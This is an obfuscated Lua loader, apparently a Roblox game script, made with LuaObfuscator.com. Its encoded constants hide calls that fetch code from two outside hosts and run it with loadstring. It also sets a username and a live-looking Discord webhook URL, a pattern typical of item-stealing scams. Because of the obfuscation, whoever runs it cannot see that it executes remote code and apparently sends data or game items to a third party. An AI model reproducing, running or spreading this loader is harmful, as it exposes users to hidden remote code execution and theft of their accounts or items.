--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v111=v5(v89,v19);v19=nil;return v111;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0;local v91;while true do if (v90==0) then v91=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (1638 -(1523 + 114)))) ;return v91-(v91%((838 + 94) -(857 + 74))) ;end end else local v92=(570 -(367 + 201))^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=117 -(32 + 85) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (3720433 + 13056783)) + (v40 * (66493 -((1072 -(67 + 113)) + 65))) + (v39 * (610 -(260 + 94))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (9 -5) ;v37=(259 + 92) -(87 + 263) ;end end end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,3 -2 ,38 -(10 + 8) ) * ((954 -(802 + 150))^32)) + v42 ;local v46=v20(v43,21,119 -88 );local v47=((v20(v43,85 -53 )==(1 -(442 -(416 + 26)))) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==((0 -0) -0)) then if (v45==(0 + 0 + 0)) then return v47 * (0 -0) ;else v46=1188 -(1069 + 118) ;v44=0 -0 ;end elseif (v46==(4477 -2430)) then return ((v45==(0 + 0)) and (v47 * (((1 -0) -0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(438 -(145 + 293))) then return "";end end v49=v3(v16,v18,(v18 + v48) -((137 + 294) -(44 + 386)) );v18=v18 + v48 ;local v50={};for v66=1487 -(998 + 488) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v102==0) then local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if ((1024 -(706 + 318))==v116) then v117=(function() return 0;end)();while true do if (v117~=(1251 -(721 + 530))) then else v93=(function() return 0;end)();v94=(function() return nil;end)();v117=(function() return 1;end)();end if (v117==(2 -1)) then v102=(function() return 2 -1 ;end)();break;end end break;end end end if (1==v102) then while true do if (v93~=(0 -0)) then else v94=(function() return v95();end)();if (v96(v94, #",", #".")~=(700 -(271 + 429))) then else local v122=(function() return 0 + 0 ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if ((2 -0)==v122) then while true do if (v123~= #"!") then else local v177=(function() return 0 -0 ;end)();local v178=(function() return;end)();while true do if (v177==(285 -(134 + 151))) then v178=(function() return 1665 -(970 + 695) ;end)();while true do if (v178~=0) then else v126=(function() return {v97(),v97(),nil,nil};end)();if (v124==(0 -0)) then local v185=(function() return 1171 -(418 + 753) ;end)();local v186=(function() return;end)();while true do if ((1990 -(582 + 1408))~=v185) then else v186=(function() return 0 -0 ;end)();while true do if (v186==(0 -0)) then v126[ #"xnx"]=(function() return v97();end)();v126[ #"http"]=(function() return v97();end)();break;end end break;end end elseif (v124== #"[") then v126[ #"-19"]=(function() return v98();end)();elseif (v124==(7 -5)) then v126[ #"xnx"]=(function() return v98() -(2^(1840 -(1195 + 629))) ;end)();elseif (v124== #"19(") then local v193=(function() return 0 -0 ;end)();local v194=(function() return;end)();while true do if (v193~=(0 + 0)) then else v194=(function() return 0;end)();while true do if (v194~=(241 -(187 + 54))) then else v126[ #"91("]=(function() return v98() -(2^16) ;end)();v126[ #"?id="]=(function() return v97();end)();break;end end break;end end end v178=(function() return 781 -(162 + 618) ;end)();end if (v178==1) then v123=(function() return 2 + 0 ;end)();break;end end break;end end end if (v123~= #"91(") then else if (v96(v125, #"xnx", #"asd")== #"}") then v126[ #"0836"]=(function() return v99[v126[ #"asd1"]];end)();end v100[v101]=(function() return v126;end)();break;end if (v123==(0 + 0)) then local v180=(function() return 0 + 0 ;end)();local v181=(function() return;end)();while true do if (v180~=0) then else v181=(function() return 0;end)();while true do if (v181~=(0 -0)) then else v124=(function() return v96(v94,1771 -(1749 + 20) , #"asd");end)();v125=(function() return v96(v94, #"0836",6);end)();v181=(function() return 1;end)();end if (v181==(1 -0)) then v123=(function() return  #"~";end)();break;end end break;end end end if (v123==(1 + 1)) then local v182=(function() return 1636 -(1373 + 263) ;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 0;end)();while true do if (v183~=(1 + 0)) then else v123=(function() return  #"xxx";end)();break;end if (v183==(1000 -(451 + 549))) then if (v96(v125, #",", #"|")== #"[") then v126[2]=(function() return v99[v126[1 + 1 ]];end)();end if (v96(v125,1 + 1 ,2 -0 )== #"!") then v126[ #"91("]=(function() return v99[v126[ #"91("]];end)();end v183=(function() return 1 -0 ;end)();end end break;end end end end break;end if (v122==(0 -0)) then local v168=(function() return 0 -0 ;end)();local v169=(function() return;end)();while true do if (v168==(1384 -(746 + 638))) then v169=(function() return 0 + 0 ;end)();while true do if (v169==(1 -0)) then v122=(function() return 1 + 0 ;end)();break;end if (v169~=(341 -(218 + 123))) then else v123=(function() return 0;end)();v124=(function() return nil;end)();v169=(function() return 1582 -(1535 + 46) ;end)();end end break;end end end if (v122==1) then local v170=(function() return 0 -0 ;end)();while true do if (v170==(0 + 0)) then v125=(function() return nil;end)();v126=(function() return nil;end)();v170=(function() return 1 + 0 ;end)();end if (v170~=(561 -(306 + 254))) then else v122=(function() return 5 -3 ;end)();break;end end end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end;end)();local v52=(function() return function(v103,v104,v105) local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();while true do if ((0 -0)~=v106) then else v107=(function() return 1467 -(899 + 568) ;end)();while true do if (v107==0) then local v121=(function() return 584 -(57 + 527) ;end)();while true do if (v121==(0 + 0)) then v103[v104-#"|" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #",",v57 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(0 -0)) then v70=(function() return 0;end)();v71=(function() return nil;end)();v69=(function() return 604 -(268 + 335) ;end)();end if (v69~=(291 -(60 + 230))) then else v72=(function() return nil;end)();while true do if ((572 -(426 + 146))==v70) then local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if (v118~=0) then else v119=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v119) then v71=(function() return v21();end)();v72=(function() return nil;end)();v119=(function() return 1457 -(282 + 1174) ;end)();end if (v119==(812 -(569 + 242))) then v70=(function() return 2 -1 ;end)();break;end end break;end end end if ((1 -0)==v70) then if (v71== #"~") then v72=(function() return v21()~=0 ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"-19") then v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end end end v56[ #"asd"]=(function() return v21();end)();for v73= #".",v23() do FlatIdent_24A02,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_24A02,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"~",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[(219 -(42 + 174)) -2 ];local v64=v60[2 + 0 ];local v65=v60[3];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1 + 0 ;local v80= -(1 -0);local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v108=1257 -(1043 + 214) ,v83 do if ((v108>=v77) or (55==2387)) then v81[v108-v77 ]=v82[v108 + (3 -2) ];else v85[v108]=v82[v108 + (1213 -(323 + 889)) ];end end local v86=(v83-v77) + ((2 + 0) -1) ;local v87;local v88;while true do v87=v75[v79];v88=v87[581 -(361 + 219) ];if (v88<=(329 -(53 + 267))) then if (v88<=(1 + 3)) then if ((1454<2491) and (v88<=(1 + 0))) then if ((v88==((176 + 237) -((1519 -(363 + 1141)) + 398))) or (2722<=164)) then local v127=v87[984 -(18 + 964) ];v85[v127]=v85[v127](v13(v85,v127 + ((1583 -(1183 + 397)) -2) ,v80));else local v129=v87[2 + 0 ];local v130=v85[v87[(5 -3) + 1 ]];v85[v129 + 1 ]=v130;v85[v129]=v130[v87[854 -(20 + 830) ]];end elseif (v88<=2) then v85[v87[2 + 0 ]]=v62[v87[129 -(116 + 10) ]];elseif ((v88==(1 + 0 + 2)) or (4157<=2803) or (2408<2109)) then do return;end else do return;end end elseif (v88<=(744 -(542 + 196))) then if (v88==(10 -5)) then v85[v87[1 + 1 ]]=v87[2 + 1 ];else v79=v87[2 + 1 + 0 ];end elseif (v88<=(18 -11)) then local v139=v87[4 -2 ];local v140=v85[v87[(3529 -(1913 + 62)) -(710 + 416 + 425) ]];v85[v139 + ((1074 -668) -(118 + 287)) ]=v140;v85[v139]=v140[v87[15 -11 ]];elseif (v88==8) then v85[v87[1123 -(118 + (2936 -(565 + 1368))) ]]();else v85[v87[5 -(11 -8) ]]=v62[v87[3]];end elseif (v88<=(391 -(142 + 235))) then if ((4853>=2982) and (v88<=11)) then if ((4134>3357) and (v88==(45 -35))) then v85[v87[2]]();else local v144=v87[1 + 1 ];v85[v144]=v85[v144](v13(v85,v144 + 1 ,v80));end elseif ((v88<=(989 -(553 + (2085 -(1477 + 184))))) or (33==1455)) then v62[v87[5 -2 ]]=v85[v87[2 + 0 ]];elseif (v88>(13 + 0)) then if ((v85[v87[2]]==v87[4]) or (3417<2534)) then v79=v79 + 1 + 0 ;else v79=v87[2 + 1 ];end elseif ((v85[v87[2]]==v87[3 + 1 ]) or (443>=4015)) then v79=v79 + (2 -1) ;else v79=v87[7 -4 ];end elseif (v88<=(35 -19)) then if (v88>(5 + 10)) then local v148=v87[2];local v149,v150=v78(v85[v148](v13(v85,v148 + 1 ,v87[3])));v80=(v150 + v148) -1 ;local v151=0;for v159=v148,v80 do v151=v151 + ((5 -1) -3) ;v85[v159]=v149[v151];end else v79=v87[756 -(239 + 514) ];end elseif (v88<=17) then local v153=0 + 0 ;local v154;local v155;local v156;local v157;while true do if (v153==(1331 -(797 + 532))) then for v174=v154,v80 do v157=v157 + 1 + 0 ;v85[v174]=v155[v157];end break;end if (v153==(1 + 0)) then v80=(v156 + v154) -(2 -1) ;v157=1202 -(373 + 829) ;v153=733 -(476 + 255) ;end if ((3382>166) and (v153==0)) then v154=v87[1132 -(369 + 761) ];v155,v156=v78(v85[v154](v13(v85,v154 + 1 + 0 + 0 ,v87[5 -(858 -(564 + 292)) ])));v153=(1 -0) -0 ;end end elseif (v88>(256 -(64 + 174))) then v62[v87[1 + 2 ]]=v85[v87[2]];else v85[v87[2 -0 ]]=v87[339 -(144 + 192) ];end v79=v79 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03173Q00682Q7470733A2Q2F7A61706875622E78797A2F4578656303083Q00557365726E616D6503083Q005831335F574F524B03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239372Q322Q3331393138372Q322Q3634362F6C2Q465436634F7850492Q6A4359764D394161536D566A625256534F79786530572Q48726A57387753386F48643369592Q64552D73453876453267382D6A686459734147001B3Q0012053Q00013Q00260E3Q0012000100020004063Q00120001001202000100033Q001202000200043Q002001000200020005001205000400064Q0010000200046Q00013Q00022Q0008000100010001001202000100033Q001202000200043Q002001000200020005001205000400074Q0010000200046Q00013Q00022Q00080001000100010004063Q001A000100260E3Q0001000100010004063Q00010001001205000100093Q001213000100083Q0012050001000B3Q0012130001000A3Q0012053Q00023Q0004063Q000100012Q00033Q00017Q00",v9(),...);
